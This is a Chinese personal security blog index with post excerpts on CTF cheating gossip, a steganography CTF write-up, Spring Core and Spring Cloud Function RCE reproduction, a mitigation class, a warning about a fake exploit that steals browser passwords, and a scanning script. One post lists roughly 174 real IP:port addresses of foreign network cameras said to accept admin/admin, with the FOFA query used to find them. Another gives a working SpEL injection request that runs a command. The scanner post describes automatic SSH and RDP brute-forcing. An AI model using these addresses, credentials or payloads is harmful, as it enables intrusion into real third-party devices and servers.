叶子:CTF劳资有手就行,排我前面的都是PY

今天的投稿是来自CTF比赛方面的 少年自有凌云志,网安更待少年时,这句话出自ccs极客少年比赛。近年来,网络安全形势日益严峻复杂,特别是电信网络诈骗犯罪已呈高发态势,网络安全教育亟待从青少年抓起。所以就有了今天的主角一位16岁热爱网络安全的男高中生 叶子或者0x11或者A1ph@ ,可能看到这个师傅们很疑惑啊,谁会一下子用三个id?但是没错我们的主角会,(可能是怕py的时候被认出来)看到这,师傅们应该明白了今天的主题,由于他的id过多,所以下面统称py佬,上图看看别人对他的评价 那么这一波我也是将他本该的称号物归原主,自然以佬字辈尊称肯定是在某方面比较权威和精通的人,所以接下来给师傅们讲讲他是如何在py上获得佬字尊称的 那么又要回到开头所提到的ccs极客少年,是的这是青少年的ctf比赛,那么自然少不了我们的py佬,我们的py佬在比赛开始前就建立了专门的py小群,在比赛中稳定发挥,靠着熟练的人脉搜题法,成功拿下了比赛的第三名,可喜可贺,可是偏偏在这时被人举报了,真是老天无眼啊,我都替他可惜,又错失了装逼的好时机,现在来看一下案发过程,顺带分析一下他的py姿势 以一句“在吗”简单开头,顺达尊称一句师傅,让人放下防备 在得到他人回应以后以一招开门见山直逼主题,可惜碰壁 看来我们的py佬也是有学习之心的,在py的同时不忘寻求解题思路 Py佬发现直接要flag好像行不通,于是开始阿谀奉承,膜拜大佬,嘲讽自己是废物,其实他不知道,他在py方面的成就远超他人 最后我们可怜的py佬没有如愿拿到flag还惨遭举报 最终成绩作废, 我们的py佬在得知成绩作废以后心灰意冷 可谁知,在两个月以后他又卷土重来,参加了弱口令实验室招新 这一波他直接将别的师傅当做flag提款机疯狂榨干,我们也发现py佬真的名不虚传,只会py,栈溢出都不会, 可怜的提款机还蒙在鼓里 接下来我们的py佬发现有人愿意免费做赛题,狂喜! 这时他排到了第5,但他没有发挥全部实力 可以看出py佬的野心很大 这时候我们的py佬登顶榜一、恭喜啊,超常发挥了 不忘骂一下出题人 这里可见py佬基础之差,但没事,因为他会py 可悲啊,最后还是让主办方知道了,无缘第一,哎,可惜啊
Read More ~

玩一波国外摄像头漏洞-174个弱口令

本来想挖任意用户添加,然后发现无用,简单看了一下fofa201个目标,弱口令还是挺多的 用户密码admin/admin fofa语句 app="Finetree-5MP-Network-Camera" py脚本 https://github.com/ChinaRan0/Finetree-5MP ''' 75.99.238.164:8087 188.115.19.229:50001 47.23.144.92:8081 75.99.238.164:8087 188.115.19.229:50001 47.23.144.92:8081 173.220.221.246:8082 47.23.163.196:8088 173.220.245.75:8082 96.56.55.234:8084 108.58.221.156:8082 108.162.59.21:8081 108.58.221.156:8086 173.220.221.246:8088 75.99.230.14:8090 47.22.158.218:8083 173.220.245.75:8090 47.23.145.172:8083 75.99.228.61:8085 47.22.158.218:8082 75.99.238.165:8090 75.99.225.156:8081 47.23.163.196:8089 47.22.138.156:8082 47.23.136.211:8082 75.99.225.156:8089 75.99.230.14:8089 75.99.238.165:8089 173.220.245.75:8089 75.99.225.156:8087 47.23.163.196:8090 75.99.228.61:8087 108.162.59.21:8089 108.58.209.164:8083 108.58.221.156:8083 75.99.229.251:8082 47.23.144.92:8086 75.99.230.14:8082 75.99.229.251:8083 75.99.230.14:8083 75.99.238.165:8083 75.99.238.164:8088 47.23.163.196:8085 75.99.238.165:8088 96.56.77.14:8085 173.220.245.75:8085 47.23.144.92:8085 75.99.229.251:8085 75.99.230.13:8085 108.162.59.21:8085 75.99.238.165:8085 75.99.230.13:8087 75.99.229.251:8087 75.99.238.164:8082 96.56.77.14:8082 75.99.238.165:8087 75.99.230.14:8081 75.99.228.61:8082 108.162.59.21:8083 96.56.55.234:8085 75.99.230.14:8085 47.23.136.211:8085 173.220.221.246:8085 75.99.225.156:8085 108.58.209.164:8082 75.99.238.164:8090 173.220.204.148:8090 47.23.144.92:8088 75.99.225.156:8082 47.23.145.172:8088 75.99.229.251:8090 75.99.230.13:8088 75.99.230.14:8088 75.99.229.251:8088 47.22.138.156:8081 108.58.221.156:8088 108.58.221.156:8089 47.23.144.92:8087 173.220.245.75:8086 108.58.221.156:8090 47.22.158.218:8085 108.58.221.156:8085 47.22.138.156:8085 75.99.228.61:8086 75.99.228.61:8088 75.99.225.156:8088 47.22.138.156:8090 47.22.158.218:8081 47.23.136.211:8086 173.220.221.246:8086 75.99.230.13:8086 75.99.230.14:8086 75.99.229.251:8086 75.99.238.164:8081 75.99.238.165:8081 47.23.145.172:8086 75.99.225.156:8090 75.99.225.156:8086 75.99.230.13:8081 47.23.144.92:8084 173.220.245.75:8081 47.22.138.156:8087 75.99.238.165:8086 75.99.238.164:8086 173.220.245.75:8087 96.56.77.14:8086 75.99.230.14:8087 47.23.136.211:8087 47.22.138.156:8096 173.220.221.246:8087 108.58.221.156:8092 47.23.145.172:8087 75.99.238.165:8082 96.56.77.14:8087 47.22.158.218:8086 75.99.230.14:8093 47.22.138.156:8086 75.99.225.156:8091 173.220.221.246:8081 47.22.138.156:8095 96.56.55.234:8082 75.99.238.165:8091 75.99.238.164:8091 75.99.230.14:8091 173.220.245.75:8088 108.162.59.21:8082 75.99.238.164:8094 47.22.158.218:8087 173.220.245.75:8093 47.23.163.196:8087 75.99.238.165:8093 173.220.204.148:8091 47.22.158.218:8084 173.220.245.75:8091 108.58.209.164:8081 173.220.221.246:8083 173.220.245.76:8091 47.22.138.156:8093 108.58.221.156:8096 108.58.221.156:8091 75.99.230.14:8094 47.23.145.172:8082 75.99.238.164:8092 75.99.238.164:8093 75.99.238.165:8092 108.58.221.156:8084 47.22.138.156:8088 173.220.245.75:8094 173.220.245.75:8083 47.23.163.196:8082 47.22.138.156:8083 47.22.138.156:8094 75.99.238.165:8094 108.58.221.156:8087 75.99.238.164:8095 47.22.138.156:8084 75.99.230.14:8084 75.99.230.13:8084 108.58.221.156:8095 96.57.241.197:8095 173.220.245.75:8084 96.57.241.197:8096 173.220.245.75:8092 108.58.221.156:8093 75.99.238.164:8084 75.99.225.156:8092 47.23.136.211:8084 47.23.163.196:8084 75.99.229.251:8084 173.220.245.76:8092 75.99.225.156:8084 75.99.230.14:8092 75.99.238.165:8084 96.56.77.14:8084 '''
Read More ~

[T-Star高校挑战赛]第六题

2022-04-25 #CTF 下载得到guess file guess 得到他的格式是word,然后打开,显示隐藏内容,得到: 然后binwalk 出来一张图片 不用想,肯定是隐写 跟据题目guess和已知密钥123456 有一个图片隐写是outguess, git clone https://github.com/crorvick/outguess 自行下载编译安装 然后解 outguess -k 123456 -r image1.jpg text.txt 然后给他拼接起来得到一个新的地址: http://175.178.148.197/062ycz7s9458b772e91/webs/ 后来我就没继续做,一直没找到flag,后来赛后师傅们写出来文章,md,我差一点就拿到flag了 flag地址:http://175.178.148.197/062ycz7s9458b772e91/webs/index.php?url=http://127.0.0.2/062ycz7s9458b772e91/webs/flag.php
Read More ~

[记录网安生活] Spring Core RCE复现

先搞环境: sudo docker pull vulfocus/spring-core-rce-2022-03-29 docker run -d -p 8082:8080 --name corerce -it vulfocus/spring-core-rce-2022-03-29 EXP已分享到我的github https://github.com/ChinaRan0/SpringCoreRCE-EXP-getshell 然后跑起来本机8082端口 运行exp,得到shell
Read More ~

[记录网安生活] Spring Function RCE漏洞紧急修补建议

在应用系统的项目包下新建以下全局类,并保证这个类被 Spring 加载到(推荐在 Controller 所在的包中添加)。完成类添加后,需对项目进行重新编译打包和功能验证测试。 并重新发布项目。 ' import org.springframework.core.annotation.Order; import org.springframework.web.bind.WebDataBinder; import org.springframework.web.bind.annotation.ControllerAdvice; import org.springframework.web.bind.annotation.InitBinder; @ControllerAdvice @Order(10000) public class Xttblog{ @InitBinder public void setAllowedFields(WebDataBinder dataBinder) { String[] claArr = new String[]{"class.", "Class.", ".class.", ".Class."}; dataBinder.setDisallowedFields(claArr); } } ' 别问,core的poc还没出来,通了个大宵了。
Read More ~

[记录网安生活] Spring function RCE EXP

复现环境:https://github.com/Pizz33/Spring-Cloud-Function-SpEL 使用idea新增一个spring lnitializr项目,选择与环境匹配的java版本添加spring web和function右侧栏选择maven-package编译jar包编译完成后运行jar包 java -jar demo-0.0.1-SNAPSHOT.jar POST /functionRouter HTTP/1.1 Host: 127.0.0.1:8080 spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec("calc") Content-Type: application/x-www-form-urlencoded Content-Length: 5 ran
Read More ~

[记录网安生活] 警惕,有人利用Spring RCE EXP 钓鱼!

假的EXP: https://github.com/shakeman8/Spring-Core-RCE 该exe文件大小是8M左右,经过证实,该文件为针对安全从业人员的钓鱼攻击: https://www.virustotal.com/gui/file/45ef7d9efba711af2196fe0d14097293fb0922 根据NowSec师傅的分析,当前样本执行之后的效果如下:执行之后会读取浏览器保存的用户名、密码和对应URL、然后在C:\Users\Public下创建一个tmp文件,下次再执行,就不会上传(应该是判断这个tmp文件是否存在吧),删除tmp文件后再执行可以复现。 最后通过技术手段得到目标ip:84.247.23.128 好玩的来了。
Read More ~

博客同步不成功案例【自我反省】

现在的博客是历经了3个月的停更,然后突然想起来,发现我的文件找不到了,所以之前写的博客全都算报废了 1.重新做配置 我一直以为是GitHub Apps设置Key,然后翻到以前的账号才发现是Personal access tokens 2.同步问题: 从网上大神那找到的方案 从文档里找到Gridea,删除.git文件夹,可以意外的获得成功。 自我反省:为什么我用了将近两天才找到解决办法 1.被我自己所知的知识感觉非常自信 2.在网上找解决方法的时候不自信 3.只会用自己所学的知识解决问题,不知道闭关锁国会亡国。
Read More ~

闲来无聊,写了个脚本

FastPenetrationScan https://github.com/ChinaRan0/FPScan 快速渗透扫描 开发的初心是快速的进行渗透打点 本人技术菜只会用顺序结构来写 因为我用的kali是虚拟机,考虑到性能就不做多线程了 输入ip全自动就行端口扫描,如果扫描到22,3389,则自动进行暴力破解 如果输入域名,进行whois查询,后期加上子域名爆破 再然后,没有了。 用到的环境安装命令 pip install nmap sudo apt install nmap sudo apt install hydra
Read More ~

行了,又让老哥骂了!

我之前不是写了个QQ问候脚本嘛,然后老哥今天又骂我了说,‘正是因为有你这样的脚本在,才让这个网络的键盘侠那么猖狂!’ 我我我...冤枉啊!
Read More ~

带队了->技能大赛

山东省职业技能大赛,我以指导教师的名义在临沂带队训练,校方答应省一给10w .然后我带他们新生,发现一个傻逼的事情,这群有几个傻逼二愣子连开机插优盘都不会,我带你ma啊 不管了,先为了工资努力吧!! 冲向市赛!网络搭建省一!
Read More ~